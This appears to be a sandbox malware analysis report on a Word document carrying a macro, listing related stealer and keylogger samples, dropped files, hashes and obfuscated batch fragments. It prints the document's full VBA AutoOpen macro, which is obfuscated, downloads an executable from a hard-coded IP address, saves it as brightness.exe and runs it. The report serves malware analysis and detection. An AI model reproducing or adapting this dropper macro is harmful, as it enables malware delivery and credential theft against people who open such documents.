                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      adguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ePI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ny9LDJr6pA.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      jaTDEkWCbs.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220

                                                                                                                      Dropped Files

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\Users\Public\Libraries\jphwmyiA.pifPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                          HSBC_PAY.SCR.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                  Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                    Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\Public\Aiymwhpj.url

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Aiymwhpj.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):104
                                                                                                                                          Entropy (8bit):5.224478603849098
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM667ysbxRn:HRYFVmTWDyzv6OExRn
                                                                                                                                          MD5:79AC659ACFEF37B78BB99148F2AC4411
                                                                                                                                          SHA1:A1E40AD9CDBAA0045BAE5B735F17A7696A8A0573
                                                                                                                                          SHA-256:E15C4E5C35CA402FEC6714794F894B2B8C6D65B900F19346C56122DAB721A2AF
                                                                                                                                          SHA-512:6D3D00B91DAA741B7C1E895C85F6CF8912628C3189CF0BFA35F10508AD7D6C0FEF645B8928938BCC669B076C4F7A6575D24224C649F50F124D2AACB9DB96A6A9
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Aiymwhpj.PIF"..IconIndex=923753..HotKey=90..

                                                                                                                                          C:\Users\Public\AiymwhpjF.cmd

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):15789
                                                                                                                                          Entropy (8bit):4.658965888116939
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                                          MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                                          SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                                          SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                                          SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                                                                                                          C:\Users\Public\Libraries\Aiymwhpj

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):587483
                                                                                                                                          Entropy (8bit):7.97941698770942
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:+cZzMs7baCyZxlymn17OtgtNXR1Fye2D69AEhIKb4u/k:+cpBbR+lyG17mgtNPae9XIA/k
                                                                                                                                          MD5:CBCC38C75EFFD12EDFBFE3A42776952D
                                                                                                                                          SHA1:15888D1A926BE2E5169CCF5B2C6C44149EA478A7
                                                                                                                                          SHA-256:43B4EDAED35A38B6304187C67BE1BEDA3F18769CDB06902BCFFB7BE597AC72A5
                                                                                                                                          SHA-512:7A45405A506D59FF89056388809C7EF11F09A2C04661DEE3C6E8C0F82E7C1E230F77B98D4CCC9F3996173ED848C38FC8379337313D4A13CCD1E76CAE4D2696C7
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:.By.1.f.>...vB..X.'n...N.......B......-.$$....0....A.&&....-%.W..Ca..N..7b..R. +N..]..3X..X..HC.xF..T+.p4|.R7.hAm.M.5.T{..J.Q.Y..g.X6...`.....Ol+..t.S.;...>^}0.m.0O.z9.yt.:..Q....K._...T.|@...5......A......T!..x.uN......$$\..h..+^.....Bc.V.....H......}.N.q...9f.l...>RB....(".....]...d./ !o.[.*....X..$$...!.....y-o9%.._^..f..Ih.W.A..S4..0...V..&$..V8..M..[76..N.O.\.e.#.t.V.D..gG.J...b0.e...g.0.r.@.N....W. .nx!Q.b....Z.^....3jiN..je#......:......L7..!...T+x@i..:'.H../&$.[.~.Y....h.[.. .x.....>&$%....+...,.R....K....Gz...........'..E\....W.Z....c.f..".'U7..1..SF...5J.|1..1M.r4.9.A.}Y.%.J.`....o.2k.Ecr.=u.=Uu....mm.5.-.q..=.$$~....GhAh..j-.....g..d....d.........+..... .....7.).j..It4..%G...w..d.l.i.R.S..p/.+.8.jz.>.E...P.[.{..]).%b:.x3x,....-.:&$..Kz.C/.r.}&$)=.|U..Ca..g.$&.j..C..Q+.ey..KL..)pI....%.+....B..=..m.\C.i5....u...*. k...O..l..8......,.....C.....}6......-Y.5....=...p..H.."@...N..s.>....1%..lm.......G.e....].(h.|.9x-%;..]pN.

                                                                                                                                          C:\Users\Public\Libraries\Aiymwhpj.PIF

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1161216
                                                                                                                                          Entropy (8bit):7.246990828069092
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                                                                                                                                          MD5:6047499517804F1EA76B508CA469DE99
                                                                                                                                          SHA1:BA5E8A683C8B8B54A14984D86715040D00777F11
                                                                                                                                          SHA-256:03B17E6FE6CE874C0CF78B2E560F5FB4106E07CE33799632B2E1BBF24E9FB371
                                                                                                                                          SHA-512:A617FD0131D75361D20423B0BC77B6EE65FE071FECF8A9FAB7EA42BE7F9716113468AF15369981F7F652A39F6AA7A77250E2E02783549DA2FCBC54D93821A76F
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................P..n&... ...........................|..................................................TW...............................text............................... ..`.itext..H........................... ..`.data...@........ ..................@....bss.....6...............................idata..n&...P...(..................@....tls....4................................rdata..............................@..@.reloc...|.......~..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................

                                                                                                                                          C:\Users\Public\Libraries\FX.cmd

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8556
                                                                                                                                          Entropy (8bit):4.623706637784657
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                                          MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                                          SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                                          SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                                          SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                                                                                                          C:\Users\Public\Libraries\NEO.cmd

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):46543
                                                                                                                                          Entropy (8bit):4.705001079878445
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                                          MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                                          SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                                          SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                                          SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                                                                                                          C:\Users\Public\Libraries\jphwmyiA.pif

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):175800
                                                                                                                                          Entropy (8bit):6.631791793070417
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                                          MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                                          SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                                          SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: PI ITS15235.doc, Detection: malicious, Browse
                                                                                                                                          • Filename: PO#5_Tower_049.bat, Detection: malicious, Browse
                                                                                                                                          • Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: PO_B2W984.com, Detection: malicious, Browse
                                                                                                                                          • Filename: image.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                                                                                          • Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFD49D79A280DD3CA3.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\Desktop\~$T # KRPBV2663 .doc

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):162
                                                                                                                                          Entropy (8bit):2.8584355907719186
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:klt+lll9OQs/RFu/t/HlNc9+RT5t:7tfs/RFuF/0wRFt
                                                                                                                                          MD5:55EFF8AE525CB6216C40FF246F8A2232
                                                                                                                                          SHA1:D14E7C499B084C53E99AA268239C43071F1A0602
                                                                                                                                          SHA-256:18574D1DEF50BD820D257F36C330FE8912FFAE51D64D38EFEC561656876A14FB
                                                                                                                                          SHA-512:870C2C54C418D6B56E91FECC280FBCE11B77F931A29FB52E700475DAD281912C10D719150B0E236C193478B216165DFA86092D41C5C5EFFB717E2451BE8186B2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.user.................................................a.l.f.o.n.s............`.c.........a.i........4F...................................`.c4"/.}..i....@....=.i

                                                                                                                                          C:\Windows\SysWOW64\brightness.exe

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1161216
                                                                                                                                          Entropy (8bit):7.246990828069092
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                                                                                                                                          MD5:6047499517804F1EA76B508CA469DE99
                                                                                                                                          SHA1:BA5E8A683C8B8B54A14984D86715040D00777F11
                                                                                                                                          SHA-256:03B17E6FE6CE874C0CF78B2E560F5FB4106E07CE33799632B2E1BBF24E9FB371
                                                                                                                                          SHA-512:A617FD0131D75361D20423B0BC77B6EE65FE071FECF8A9FAB7EA42BE7F9716113468AF15369981F7F652A39F6AA7A77250E2E02783549DA2FCBC54D93821A76F
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................P..n&... ...........................|..................................................TW...............................text............................... ..`.itext..H........................... ..`.data...@........ ..................@....bss.....6...............................idata..n&...P...(..................@....tls....4................................rdata..............................@..@.reloc...|.......~..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Nadine Daniel, Template: Normal.dotm, Last Saved By: GRACE, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sun Jan 5 21:34:00 2025, Last Saved Time/Date: Sun Jan 5 21:34:00 2025, Number of Pages: 1, Number of Words: 348, Number of Characters: 1985, Security: 0
                                                                                                                                          Entropy (8bit):4.315631656351978
                                                                                                                                          TrID:
                                                                                                                                          • Microsoft Word document (32009/1) 54.23%
                                                                                                                                          • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                                                          File name:ITT # KRPBV2663 .doc
                                                                                                                                          File size:52'736 bytes
                                                                                                                                          MD5:754c08a32cbfe16e0982b5b56835e247
                                                                                                                                          SHA1:7338cada263faae3d79631efa1c895bf690a4eb3
                                                                                                                                          SHA256:d9980559077d0cf6e251608efa44277ac5cd2b64236ecc31b352a93992e2f2b7
                                                                                                                                          SHA512:6cc3a3a351b58cb5763a745b07a492aaf944e1526a49c3f6da7135e6295a701e7f526c052fcf4961af7a08756f51226f5fbecb4e242d8fdde0f61fa1717772e1
                                                                                                                                          SSDEEP:384:Zp0xfMJvBv2xv8R89JMjN6m4iKpIEOqY+tKiSsqdg1vA9tzt/Mi+P0jN4pfZt8Fs:ZkUJJU6wVoJ+1o9t1MRi4pQmv+SWw
                                                                                                                                          TLSH:E8333121B2C2CE2BE0264875C989C7747725FDABAE95460735C97F1F7C3EA209A43B50
                                                                                                                                          File Content Preview:........................>.......................O...........R...............N..................................................................................................................................................................................

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:35e1cc889a8a8599

                                                                                                                                          Static OLE Info

                                                                                                                                          General

                                                                                                                                          Document Type:OLE
                                                                                                                                          Number of OLE Files:1

                                                                                                                                          OLE File "ITT # KRPBV2663 .doc"

                                                                                                                                          Indicators
                                                                                                                                          Has Summary Info:
                                                                                                                                          Application Name:Microsoft Office Word
                                                                                                                                          Encrypted Document:False
                                                                                                                                          Contains Word Document Stream:True
                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                          Contains ObjectPool Stream:False
                                                                                                                                          Flash Objects Count:0
                                                                                                                                          Contains VBA Macros:True
                                                                                                                                          Summary
                                                                                                                                          Code Page:1252
                                                                                                                                          Title:
                                                                                                                                          Subject:
                                                                                                                                          Author:Nadine Daniel
                                                                                                                                          Keywords:
                                                                                                                                          Comments:
                                                                                                                                          Template:Normal.dotm
                                                                                                                                          Last Saved By:GRACE
                                                                                                                                          Revion Number:2
                                                                                                                                          Total Edit Time:0
                                                                                                                                          Create Time:2025-01-05 21:34:00
                                                                                                                                          Last Saved Time:2025-01-05 21:34:00
                                                                                                                                          Number of Pages:1
                                                                                                                                          Number of Words:348
                                                                                                                                          Number of Characters:1985
                                                                                                                                          Creating Application:Microsoft Office Word
                                                                                                                                          Security:0
                                                                                                                                          Document Summary
                                                                                                                                          Document Code Page:1252
                                                                                                                                          Number of Lines:16
                                                                                                                                          Number of Paragraphs:4
                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                          Company:
                                                                                                                                          Contains Dirty Links:False
                                                                                                                                          Shared Document:False
                                                                                                                                          Changed Hyperlinks:False
                                                                                                                                          Application Version:983040

                                                                                                                                          Streams with VBA

                                                                                                                                          VBA File Name: ThisDocument.cls, Stream Size: 4808
                                                                                                                                          General
                                                                                                                                          Stream Path:Macros/VBA/ThisDocument
                                                                                                                                          VBA File Name:ThisDocument.cls
                                                                                                                                          Stream Size:4808
                                                                                                                                          Data ASCII:. . . . . . . . V . . . . . . . . . ] . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i
                                                                                                                                          Data Raw:01 16 01 00 01 f0 00 00 00 56 05 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 5d 05 00 00 81 0f 00 00 00 00 00 00 01 00 00 00 ac 11 04 75 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          VBA Code
                                                                                                                                          Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
 
Dim xHttp:
'this is a comment



Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")
'this is a comment
Dim bStrm:
'this is a comment
Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")



Dim nirm1
nirm1 = "h"
Dim nirm2
nirm2 = "t"
Dim nirm3
nirm3 = "t" & "p:/" & "/147.124.216.113/image"
Dim nirm4
nirm4 = "."
Dim nirm5
nirm5 = "e"
Dim nirm6
nirm6 = "x"
Dim nirm7
nirm7 = "e"



Dim plpl
plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

'this is a comment
xHttp.Open "GET", plpl, False
xHttp.Send




 
With bStrm
 .Type = 1
.Open
 .write xHttp.responsebody
 
 'this is a comment
 
Dim monu1
 monu1 = "brightness"
 Dim monu2
 monu2 = "."
 'this is a comment
 Dim monu3
 monu3 = "e"
 'this is a comment
 Dim monu4
 monu4 = "x"
 'this is a comment
 Dim monu5
 monu5 = "e"
 'this is a comment
 Dim monu6
 monu6 = monu1 & monu2 & monu3 & monu4 & monu5
 
 
 .savetofile monu6, 2


Dim parveen1
Dim parveen2
Dim parveen3
Dim parveen4
Dim praveen1
praveen1 = """brightness"
Dim praveen2
praveen2 = "."
'this is a comment
Dim praveen3
praveen3 = "e"
'this is a comment
Dim praveen4
praveen4 = "x"
'this is a comment
Dim praveen5
praveen5 = "e"""
'this is a comment



Dim praveen6
praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
 


End With
 
Shell (praveen6)
 
End Sub

                                                                                                                                          Streams

                                                                                                                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                          General
                                                                                                                                          Stream Path:\x1CompObj
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:114
                                                                                                                                          Entropy:4.235956365095031
                                                                                                                                          Base64 Encoded:True
                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                          General
                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:4096
                                                                                                                                          Entropy:0.248545188854887
                                                                                                                                          Base64 Encoded:False
                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
